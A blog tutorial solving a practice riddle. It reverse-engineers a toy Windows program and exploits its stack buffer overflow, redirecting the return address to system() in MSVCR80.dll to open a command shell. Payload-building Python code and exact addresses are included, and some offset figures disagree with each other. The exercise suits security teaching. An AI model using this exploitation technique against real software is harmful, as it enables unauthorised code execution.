Hello again and welcome to my blog. I've recently
encountered a very nice riddle aimed at BoF and RE fans at the same time. This
challenging riddle takes the trainee another step out of the box, testing their
ability to Reverse Engineer a program and then
exploit it with a Buffer Overflow. Stay tuned :P
Let’s take a look at the simple executable:
All this innocent file does is ask a
question and wait for the user to reply with their name.
The name is saved on the stack as a local
variable and then echoed back to the command line as text.
**This is the right time to say that if you don't know
what RE or BoF is, it's best to research the two a bit and come
back when you're better prepared.
Long story short, RE is of course Reverse Engineering: the
art of analyzing a compiled program, without its source code, to understand how it works. A programmer can use that knowledge to extend the program's functionality, and a malicious user can use it to find a way to inject malicious input. Extending functionality can of course also mean exploiting the program to do things it's not supposed to do.
BoF is short for a vulnerability called Buffer Overflow. This "bug" is characterized by the injection of an oversized string into a program, forcing it
to "step out" of its allocated buffer and overwrite neighboring variables and
saved areas in memory in a way that causes a crash or gets malicious code executed.
There are multiple ways to exploit this vulnerability. We’ll be
focusing on Stack BoF.
Here’s the deal:
From left to right: let's say I wrote code that creates
a char c[12] array and initializes
it to "hello". The stack will look something like the second
image.
Notice the green and red areas: those are the
saved areas for the Frame Pointer and the Return Address. These two
are very important, because they tell the program where the caller's frame is on the stack and
where to return to.
In my code I've also created a function that rewrites this
variable, but I didn't add any restriction on how much can be written to it. This
mistake was expensive: a loop in main() wrote 200 'A's into my
stack variable (see image 3), exceeding the buffer and also overwriting the Frame Pointer
and the Return Address. When my function reaches its return; statement it will use the Return Address from the stack, which now holds 0x41414141 (AAAA). This address is of course not mapped and will cause an Access Violation. Windows then terminates the application because there is no Exception Handler to catch it.
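To make the overwrite concrete, here is a toy simulation in Python. It is only a sketch: the "stack frame" is a plain byte array, the buffer is assumed to be followed immediately by the saved Frame Pointer and Return Address (a real compiler may add padding), and the two saved values are made up for illustration.

```python
import struct

BUF_SIZE = 12                  # char c[12]
FP_OFFSET = BUF_SIZE           # assumption: saved Frame Pointer sits right after the buffer
RA_OFFSET = FP_OFFSET + 4      # assumption: saved Return Address follows the Frame Pointer


def make_frame():
    """Build a toy stack frame: buffer, saved FP, saved RA, then spare room."""
    frame = bytearray(256)
    frame[0:6] = b"hello\x00"
    struct.pack_into("<I", frame, FP_OFFSET, 0x0018FF80)  # made-up frame pointer
    struct.pack_into("<I", frame, RA_OFFSET, 0x00401000)  # made-up return address
    return frame


def unchecked_copy(frame, data):
    """Copy data to the start of the buffer without checking BUF_SIZE (the bug)."""
    frame[0:len(data)] = data


def saved_return_address(frame):
    """Read the 4-byte little-endian value stored in the Return Address slot."""
    return struct.unpack_from("<I", frame, RA_OFFSET)[0]


frame = make_frame()
print(hex(saved_return_address(frame)))   # 0x401000
unchecked_copy(frame, b"A" * 200)
print(hex(saved_return_address(frame)))   # 0x41414141
```

The second print shows the same 0x41414141 (AAAA) that the crashed program tries to return to.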
Now let's take a minute to think what would have happened if a
malicious user could exploit this vulnerability and create a BoF in that program.
Well yeah, the program then crashes, the hacker is happy, but what else?
You're right: if an attacker can overwrite the Return
Address with some REAL address in the Address Space, she can redirect execution to
code of her choosing. This is exactly what we are about to do!
First things first, we need to use a disassembler to
virtually build the stack and see what exactly we need in order to exploit
this executable.
**I'm using IDA Pro (free version) and OllyDBG (IDA does static analysis while Olly
can analyze at run-time)
Here is our executable in the static code analysis tool. If
we look at the “View-A” window we can see our binary file laid out, row by row,
even though it says nothing about how it will be organized in the stack.
On the left of that window every row is labeled in the form
.text:[address].
Starting from the first line: EBP is of course our Base
Pointer being set up, and the mov (move) sets it to the current Stack Pointer
(the top of the stack, since the new frame is still empty). Then 40h (hex) is
subtracted from the Stack Pointer to allocate room for the local variables, and
the Source Index register (ESI) is pushed so its value can be restored later.
Then comes the printf() call and its setup (mov, push, call).
Next, the address of the local buffer at var_40+ebp is loaded into register 'A' (eax) and the push
stores it on the stack as the argument for gets(), which reads the user's input into that
buffer without any length limit. After that, the program pushes the offset of "Hello" and prints the data stored at var_40+ebp,
which is of course the user's input, followed by the rest of the sentence.
Now we know our Stack looks as follows:
40 hex (64) bytes - stack variables
4 bytes - Frame Pointer
4 bytes - Return Address
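The layout translates into offsets from the start of the input buffer. Here is a small Python sketch of that arithmetic, assuming the buffer starts exactly at the bottom of the 40h bytes of locals (as the var_40 name suggests) and that nothing else sits between the locals and the saved Frame Pointer:

```python
BUFFER_SIZE = 0x40    # bytes reserved for stack variables (from the disassembly)
POINTER_SIZE = 4      # 32-bit process: saved values are 4 bytes each

# Offsets are measured from the first byte of the input buffer.
frame_pointer_offset = BUFFER_SIZE
return_address_offset = frame_pointer_offset + POINTER_SIZE

print(f"stack variables : 0x00 - 0x{BUFFER_SIZE - 1:02X}")
print(f"Frame Pointer   : 0x{frame_pointer_offset:02X}")
print(f"Return Address  : 0x{return_address_offset:02X}")
print(f"bytes before the Return Address: {return_address_offset}")
```

Under those assumptions the Return Address starts 68 bytes into the input. The debugger has the final word on the real offsets.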
What I would like to do is to overwrite the whole stack. The
problem is that if I do that, the stack will have no valid Return Address and then
I won't be able to execute my malicious code. To solve this issue I'll need to
supply my own Frame Pointer and Return Address so the program keeps running
with no errors, keeping the stack in a correct structure.
Here is what I’m about to do:
My Frame Pointer
My Return Address
Now that I know what I want to do, I need to calculate
exactly how much garbage to inject into the program in order to
get it to write the new Return Address in the right place. Once I get there, the second
step will be to put an address into my Return Address that will instantly
take me to my malicious code.
Oops… wait a second. Take a look at the program again:
Scrolling down the Strings window we can see that the file
references a DLL called MSVCR80.dll, which suggests that the program is using this DLL. Looking at DependencyWalker (next screenshot) we can confirm our suspicion (next to the red '1').
Let's check Google for this file's capabilities, so maybe we
can spare loading a malicious DLL and carry out the attack by calling some
function from a legitimate DLL the program already uses.
Looking quickly into Google I found that - ”msvcr80.dll is a module associated with
Microsoft Visual Studio 2005 from Microsoft Corporation. It is the Microsoft C
Runtime Library and is used by programs written with Microsoft Visual Studio
2005.”
The conclusion is that this DLL probably provides system()
or _execv(). Using DependencyWalker we will try to find
the base address this DLL loads from and the relative offset of these
functions. Here is what I found:
The DLL loads from 0x78130000 and the offset to the system()
function is 0x0003009B, which means we need to add one to the other using a hex
calculator:
Go to calc.exe (Start → Run → calc) and switch the View to
Programmer (Alt+3). Switch from Decimal to Hex in the upper left corner of the calculator
and simply add the two addresses:
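If you'd rather not click through the calculator, the same sum can be checked in a couple of lines of Python. The two constants are the values quoted above. The variable names are mine.

```python
DLL_BASE = 0x78130000        # load address shown by DependencyWalker
SYSTEM_OFFSET = 0x0003009B   # offset of system() inside MSVCR80.dll

system_address = DLL_BASE + SYSTEM_OFFSET
print(f"0x{system_address:08X}")   # 0x7816009B
```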
Now we know that in order to call system() we
need to create an overflow in the stack, build some random (4-byte) Frame
Pointer that we won't even be using, so we don't care about its content, and concatenate
it with the address of the loaded function, exactly as we calculated just now.
But wait, aren't we missing something? Let's see again:
1) Overflow the program - check!
2) Create a new Frame Pointer and Return Address to keep the stack's logical structure - check!
3) Put the address of the system() function into the Return Address - check!
Ohh… we're missing system()'s argument!
Now we need to find a way to create a pointer to the place
where we put our argument. The argument for this example will be “start cmd”, which
will open a new Command Line window, waiting for you to maliciously take over
the machine.
Keep a close eye because that's a tricky one. Here's how the
stack should look:
Stack abstract              | Stack input
My Frame Pointer            | BBBB
My Return Address           | 78 16 00 9B
Pointer to command address  | Some pointer
Malicious command           | "start cmd"
**Notice that when we're injecting addresses we're using "Little
Endian", which basically means we need to write the bytes of the address in reverse order, but keep
each byte's hex value. Example: 00 B7 78 16 →
16 78 B7 00
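The byte swap is easy to get wrong by hand, so here is a short Python sketch that does it with the standard struct module. The helper name to_little_endian is mine, and the sketch assumes 32-bit (4-byte) addresses.

```python
import struct


def to_little_endian(address):
    """Pack a 32-bit address into 4 bytes, least significant byte first."""
    return struct.pack("<I", address)


# The example from the note above: 00 B7 78 16 becomes 16 78 B7 00.
print(to_little_endian(0x00B77816).hex(" ").upper())   # 16 78 B7 00
```

These are exactly the bytes, in this order, that go into the hex side of the editor.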
To get the pointer we cannot use IDA Pro, because IDA, as we
said earlier, is a static binary analysis tool. If we'd like to dynamically analyze
the code we need a tool that can make this magic happen.
OllyDBG is exactly what we need (you can also use Immunity
Debugger or the like).
Why do we need to analyze the program in run-time?
The thing is that we want to know the address of our new
code, which will only be created after we run the program and input our string.
Here is the next procedure:
Now we would like to execute the file, input the string that
causes the overflow and calculate exactly where the call to system()
should end.
Starting the program we can see the binary, and by holding
the step over button (F8), until it automatically stops, we get to the
following address – 00 18 FF 4C:
This address is of course the location where the user is
supposed to insert his input. If we look at the Command Line prompt we
should see:
Now we have everything we need but a comfortable editor to
write our exploit in.
I recommend a nice editor called HxD, but you can
also use Hex Editor Neo and others.
Our exploit should look as follows:
40 Hex (stack variables) + 10 Hex (4-byte Frame Pointer + 4-byte
Return Address + 4-byte new Frame Pointer) + MSVCR80.DLL address (system() location) +
4-byte pointer + system command (start cmd)
This is how it looks in HxD:
**Notice that addresses are supposed to be written on the Hex (left) side while ASCII characters are written on the text (right) side.
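If you prefer a script over a hex editor, the same bytes can be assembled in Python. This is only a sketch that transcribes the formula above literally: the filler length (40 Hex + 10 Hex), the system() address 0x7816009B and the pointer 0x0018FF4C are the values the text has at this point, and build_payload is a made-up helper name. Treat all of them as parameters to confirm in the debugger.

```python
import struct


def build_payload(filler_len, system_address, command_pointer, command):
    """Concatenate filler, two little-endian 32-bit addresses and the command."""
    filler = b"A" * filler_len                          # garbage up to the address slot
    return (filler
            + struct.pack("<I", system_address)         # address of system()
            + struct.pack("<I", command_pointer)        # pointer to the command string
            + command)                                  # the command itself, as ASCII


payload = build_payload(
    filler_len=0x40 + 0x10,          # taken from the formula in the text
    system_address=0x7816009B,       # DLL base + offset, as calculated earlier
    command_pointer=0x0018FF4C,      # address observed in the debugger
    command=b"start cmd",
)
print(len(payload))
print(payload[0x50:].hex(" ").upper())
```

Writing payload to a file opened in binary mode ("wb") gives the same kind of file you would otherwise save from HxD.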
Let’s save this file as exploit.dat and do the following:
1) Open the Command Line
2) Go to the overFlowMe.exe location
3) Run the following command:
overFlowMe.exe < c:\filepath\exploit.dat
a. This command executes the .exe file, and when the program asks for user input, the content of exploit.dat is fed into the gets() call, exploiting the program.
But wait… we got an
error:
Why is that?! We did everything the way it's supposed to be done…
Do you have any idea?
Well, I've encountered this error and after a quick
brainstorm with myself I understood that it has to be one of three options:
1) Something is wrong in the overflow
a. Countermeasure - calculated everything again. It came out exactly the same.
2) Something is wrong with the return address - could be.
3) Something is wrong with the pointer - couldn't be. If it were a pointer issue the error would be different. Trust me on that for now.
Eliminating (1) and (3), I started checking whether the
address is wrong. A quick consultation with a friend got me to a very interesting
solution. My friend told me that DependencyWalker only displays a preferred
address, while the loader is free to map the DLL somewhere else at run-time, and
that I'd better double check it in OllyDBG, and so I did.
Here is what I did:
1) Open Olly and click on the 'M' (Memory) button.
2) A window will open, with an organized table containing everything you need to know about the program's memory.
3) Look for your DLL under the "owner" column and check what address it is loaded from.
4) In the following image we can see that the MSVCR80.DLL PE header is loaded at 74 B0 00 00
Now let’s correct our exploit:
74 B0 00 00 + 00 03 00 9B = 74 B3 00 9B
** 00 03 00 9B is the offset to system() remember?
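The correction is a rebase: subtract the preferred base from the old address to get the offset back, then add the base the debugger actually reports. Here is a small Python sketch with the numbers from this post. The helper name rebase is mine.

```python
PREFERRED_BASE = 0x78130000     # base shown by DependencyWalker
OLD_SYSTEM_ADDRESS = 0x7816009B # address we calculated from the preferred base
ACTUAL_BASE = 0x74B00000        # base shown in Olly's Memory window


def rebase(address, old_base, new_base):
    """Move an address from one module base to another, keeping its offset."""
    offset = address - old_base
    return new_base + offset


new_system_address = rebase(OLD_SYSTEM_ADDRESS, PREFERRED_BASE, ACTUAL_BASE)
print(f"0x{new_system_address:08X}")   # 0x74B3009B
```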
Let’s rerun overFlowMe.exe < c:\filepath\exploit.dat
Again an error!
Well, now the error is very clear. The pointer is wrong, and
system() gets a command it does not understand. It is the same as typing: c:\>wrong
windows command
Error: “‘wrong’ is not recognized as an internal or
external command…”
What is missing?
If we look at the error we see that system() tried to
execute a command from our exploit, only it started reading too early in the payload.
Going back to Olly and double clicking the address column on
the bottom right table we see that we are off by 8 from the right offset. Double clicking
again to go back to real addresses, the row marked by '==>' will probably show us
the right address, the one that points at the start of our command.
The address near ‘==>’ is 00 18 FF 54
**don’t forget “Little Endian”
Let’s rewrite the exploit again and see if that fixed our
error.
Executing the .exe again with our exploit gives us the
following:
Voilà! We got it. Our exploit worked!
We managed to create a Buffer Overflow, rebuild the stack
and execute system(“start cmd”);
Hope you've enjoyed (: